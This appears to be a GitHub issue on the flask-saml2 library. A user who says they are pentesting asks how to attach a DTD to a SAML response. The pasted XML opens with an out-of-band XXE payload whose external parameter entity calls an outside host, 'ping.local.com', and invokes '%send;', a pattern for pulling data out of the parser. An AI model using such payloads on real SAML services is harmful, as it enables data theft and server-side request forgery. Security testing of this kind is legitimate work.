search

mx-moth / flask-saml2

Flask library for building SAML Service Providers and Identity Providers
MIT License
70 stars 60 forks source link

How to add a DTD to the SAMLResponse? #30

Open abrahack opened 3 years ago

abrahack commented 3 years ago

Hello,

Please I came across this awesome project of yours while pentesting, I have some questions ?

<?xml version="1.0"?>
<!DOCTYPE data [<!ENTITY % remote SYSTEM "http://ping.local.com/foo"> %remote; %send;]>
<samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" Destination="http://localhost:9000/saml/acs/" ID="_b4e5466d30d343a39b281c89699558dd" InResponseTo="_d155a38534a04be181c9b8a9aae1b5e8" IssueInstant="2021-05-09T21:54:51.309039+00:00" Version="2.0">
  <saml:Issuer xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion">http://localhost:8000/saml/metadata.xml</saml:Issuer>
  <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
        ...
  </ds:Signature>
  <samlp:Status>
    <samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"/>
  </samlp:Status>
  <saml:Assertion xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" ID="_79630753cb3f44158e5cae1849045bf3" IssueInstant="2021-05-09T21:54:51.309039+00:00" Version="2.0">
    <saml:Issuer>http://localhost:8000/saml/metadata.xml</saml:Issuer>
    <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
      ...
    </ds:Signature>
    <saml:Subject>
      <saml:NameID Format="urn:oasis:names:tc:SAML:2.0:nameid-format:email" SPNameQualifier="http://localhost:9000/saml/metadata.xml">example@example.com</saml:NameID>
      <saml:SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer">
        <saml:SubjectConfirmationData InResponseTo="_d155a38534a04be181c9b8a9aae1b5e8" NotOnOrAfter="2021-05-09T22:09:51.309039+00:00" Recipient="http://localhost:9000/saml/acs/"/>
      </saml:SubjectConfirmation>
    </saml:Subject>
    <saml:Conditions NotBefore="2021-05-09T21:51:51.309039+00:00" NotOnOrAfter="2021-05-09T22:09:51.309039+00:00">
      <saml:AudienceRestriction>
        <saml:Audience>http://localhost:9000/saml/metadata.xml</saml:Audience>
      </saml:AudienceRestriction>
    </saml:Conditions>
    <saml:AuthnStatement AuthnInstant="2021-05-09T21:54:51.309039+00:00">
      <saml:AuthnContext>
        <saml:AuthnContextClassRef>urn:oasis:names:tc:SAML:2.0:ac:classes:Password</saml:AuthnContextClassRef>
      </saml:AuthnContext>
    </saml:AuthnStatement>
    <saml:AttributeStatement>
      <saml:Attribute Name="foo" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:basic">
        <saml:AttributeValue>bar</saml:AttributeValue>
      </saml:Attribute>
    </saml:AttributeStatement>
  </saml:Assertion>
</samlp:Response>

Thanks for your help in the near future. Regards, @abrahack.